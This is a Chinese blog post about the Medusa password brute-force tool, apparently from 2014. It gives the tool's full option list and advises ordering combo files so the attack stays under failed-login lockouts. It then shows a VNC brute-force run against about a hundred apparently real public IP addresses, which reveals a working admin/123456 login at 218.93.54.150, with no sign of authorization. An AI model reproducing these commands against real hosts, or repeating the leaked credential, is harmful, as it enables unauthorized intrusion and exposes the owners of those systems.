文档章节

暴力破解工具 medusa (马杜莎)

sincoder
 sincoder
发布于 2014/11/21 17:07
字数 1046
阅读 3231
收藏 18
点赞 0
评论 0

官网

http://foofus.net/goons/jmk/medusa/

和知名的暴力破解工具 hydra 很像的另一个工具 

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.


Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]    : Target hostname or IP address

  -H [FILE]    : File containing target hostnames or IP addresses

  -u [TEXT]    : Username to test

  -U [FILE]    : File containing usernames to test

  -p [TEXT]    : Password to test

  -P [FILE]    : File containing passwords to test

  -C [FILE]    : File containing combo entries. See README for more information.

  -O [FILE]    : File to append log information to

  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]    : Name of the module to execute (without the .mod extension)

  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d           : Dump all known modules

  -n [NUM]     : Use for non-default TCP port number

  -s           : Enable SSL

  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]     : Total number of logins to be tested concurrently

  -T [NUM]     : Total number of hosts to be tested concurrently

  -L           : Parallelize logins using one username per thread. The default is to process 

                 the entire username before proceeding.

  -f           : Stop scanning host after first valid username/password found.

  -F           : Stop audit after first valid username/password found on any host.

  -b           : Suppress startup banner

  -q           : Display module's usage information

  -v [NUM]     : Verbose level [0 - 6 (more)]

  -w [NUM]     : Error debug level [0 - 10 (more)]

  -V           : Display version

  -Z [TEXT]    : Resume scan based on map of previous scan

常用的参数

medusa -M vnc -n 5901 -R 0 -C xaa -f -T 10 -O good.txt

-M 选择破解模块

-n 自己定义服务的端口

-R 设置尝试多少次连接后 退出

-C 设置COMBO文件路径,也就是从文件做按行读取主机 用户名 和端口

可用的行格式如下:

  • host:username:password

  • host:username:

  • host::

  • :username:password

  • :username:

  • ::password

  • host::password

建议使用 combo 文件来进行爆破的功能,应该这样可以设置哪个主机先爆破,可控性较强,适用于一些限制失败次数的服务,可以设置先遍历主机 再遍历用户密码,这样可以把一段时间内对同一主机的探测次数减到最少

-f 一个主机检测到一个正确的密码后就停止

-T 设置并发主机数

-O 设置结果保存的文件,程序会将正确的结果保存到这个文件中

一次检测的主机数量不能太多,如果太多可以使用 split -l 拆分combo 文件 

root@kali :~/tmp# medusa -M vnc -n 5901 -R 0 -C xaa -f -T 10 -O good.txt

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.226.179.128

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.77

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.226.179.135

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.71.239

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.148

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.31

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.36

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.74.156

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.74.68

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.75.213

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.75.242

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.112.109

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.122.129

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.65.192

ACCOUNT CHECK: [vnc] Host: 218.93.54.xxx (19 of 100, 14 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 1 complete)

ACCOUNT FOUND: [vnc] Host: 218.93.54.150 User: admin Password: 123456 [SUCCESS]

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.100.242

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.120.212

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.121.155

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.122.148

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.64.234.132

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.64.236.48

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.4.234.30

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.64.234.254

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.66.255.103

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.69.161.253

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.69.169.218

root@kali :~/tmp# cat good.txt 

# Medusa v.2.1.1 (2014-11-21 15:51:18)

# medusa -M vnc -n 5901 -R 0 -C xaa -f -T 10 -O good.txt 

ACCOUNT FOUND: [vnc] Host: 218.93.54.xxx User: admin Password: 123456 [SUCCESS]

# Medusa has finished (2014-11-21 15:52:18).


© 著作权归作者所有

共有 人打赏支持
sincoder

sincoder

粉丝 37
博文 402
码字总数 126660
作品 1
深圳
安天365安全研究之SSH安全研究专题20171124更新

1.Windows下安装及配置ssh server(已认领)2.linux下安装及配置ssh server(秋风已认领)3.Windows及Linux配置使用ssh客户端工具(已认领)(1)BvSshClient(2)putty(3)other4.ssh基本命...

simeon2005
2017/12/13
0
0
LaserCrack:一款可扩展的暴力破解框架

  0×01 简单说明   lasercrack是一款爆力破解工具,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率,不过我还没有找到ruby写的,一方面是想从原理上理解下暴力破解漏洞...

FreeBuf
07/07
0
0
批量扫内网弱口令

公司弱口令一直没有杜绝掉,很多时候都需要安全部门定期扫描,发现弱口令,责令运维去修改弱口令 今天推荐一款比较不错的工具 hydra 和medusa 这两款都是kali 和bt 自带的 hydra 很奇怪,功能...

屋脊之上
2014/07/23
0
0
medusa 2.0的简单使用

需求:公司需要对主机进行弱口令整改,所有主机已经修改了密码,但是以防有主机没有被修改,需要测试主机的密码是多少。 因为常用的密码就是1 2 3 所以就想用1 2 3去测试所有的主机,看看那些...

zfno11
06/26
0
0
蛮力攻击工具--RSYaba

RSYaba是一款类似于Hydra和Medusa的、针对多种服务的蛮力攻击工具。开发这个工具是由于作者使用现有的一些工具获得了不好的用户体验(确切是说是以HTTP和SSH方式工作),所以,才决定开发一个...

匿名
2010/10/24
975
0
SSH 暴力破解趋势:从云平台向物联网设备迁移 云鼎实验室出品

  导语:近日,腾讯云发布2018上半年安全专题系列研究报告,该系列报告围绕云上用户最常遭遇的安全威胁展开,用数据统计揭露攻击现状,通过溯源还原攻击者手法,让企业用户与其他用户在应对...

FreeBuf
07/13
0
0
Kali Linux 秘籍 第八章 密码攻击

第八章 密码攻击 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 这一章中,我们要探索一些攻击密码来获得用户账户的方式。密码破解是所有渗透测试者都需要执行...

apachecn_飞龙
2016/10/05
0
0
黑客攻击之网络入侵——暴力攻击

黑客攻击之网络入侵——暴力攻击 作者:许本新 什么是暴力工具呢?暴力攻击的一个具体例子就是,一个黑客试图使用计算机和信息去破解一个密码。一个黑客需要破解—段单一的被用非对称密钥加密...

技术小胖子
2017/11/16
0
0
AOPR中的暴力破解

Advanced Office Password Recovery的暴力破解能够毫不费力地破解Office文档密码的密码武器之。暴力破解等同于穷举法,将所有的可能性全部列举一遍,所以破解密码只是时间的问题。在本篇文章...

neluzyy1
2015/12/21
32
0
密码破解工具--Medusa

Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmA......

匿名
2012/04/06
10.6K
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

gRPC学习笔记

gRPC编程流程 1. proto文件定义 proto文件用于定义需要通过gRPC生成的接口,可以理解为接口定义文档 2. 通过构建工具生成服务基类代码-Maven或Gradle 3. 服务端开发 服务端实现类须实现通过构...

OSC_fly
18分钟前
0
0
Docker Mac (三) Dockerfile 及命令

Dockerfile 最近学习docker的时候,遇到一件怪事,关于docker镜像可能会被破坏,还不知道它会有此措施 所以需要了解构建Dockerfile的正确方法 Dockerfile是由一系列命令和参数构成的脚本,这些命...

___大侠
44分钟前
0
0
NetCat Tutorials

Hacking with Netcat part 1: The Basics Hacking with Netcat part 2: Bind and reverse shells Hacking with Netcat part 3: Advanced Techniques 10 Introduction to Netcat - pdf NetCat......

zungyiu
45分钟前
0
0
Android Studio+NDK+Cmake 移植FFmpeg-4.0.2命令行工具

一、编译 参考大神的帖子,亲测一次编译成功:https://blog.csdn.net/bobcat_kay/article/details/80889398 鉴于以前查文档的经验,这里附上编写例子的时间:2018年7月22日 我用的是ubantu,...

她叫我小渝
45分钟前
0
0
mysql创建数据库

登录MYSQL mysql -u root -p 脚本创建数据库WeChat,并制定默认的字符集是utf8mb4。 CREATE DATABASE Wechat DEFAULT CHARSET utf8mb4 COLLATE utf8mb4_general_ci; 授权 grant all......

niithub
59分钟前
0
0
svn: Unable to connect to a repository URL 的解决方案

错误图示: 解决办法:清除本地保存的授权信息; 1:右键点击本地文件夹,选择设置; TortoiseSVN -> Settings 2:在弹出的对话框中选择 Saved Data, 右侧选择:授权地方清理所有。 然后点确...

宁哥实战课堂
今天
1
0
sleep与wait的区别

Thread.sleep(XXX)方法消耗CPU吗? 这个知识点是我之前认识一直有错误的一个知识点,在我以前的认识里面,我一直认为Thread.sleep(1000)的这一秒钟的时间内,线程的休眠是一直占用着CPU的时间...

码代码的小司机
今天
1
0
20位活跃在Github上的国内技术大牛 leij 何小鹏 亚信

本文列举了20位在Github上非常活跃的国内大牛,看看其中是不是很多熟悉的面孔? 1. lifesinger(玉伯) Github主页: https://github.com/lifesinger 微博:@ 玉伯也叫射雕 玉伯(王保平),...

海博1600
今天
1
0
Mybatis收集配置

一、Mybatis取Clob数据 1、Mapper.xml配置 <resultMap type="com.test.User" id="user"> <result column="id" property="id"/> <result column="json_data" property="jsonData" ......

星痕2018
今天
1
0
centos7设置以多用户模式启动

1、旧版本linux系统修改inittab文件,在新版本执行vi /etc/inittab 会有以下提示 # inittab is no longer used when using systemd. # # ADDING CONFIGURATION HERE WILL HAVE NO EFFECT ON......

haha360
今天
1
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部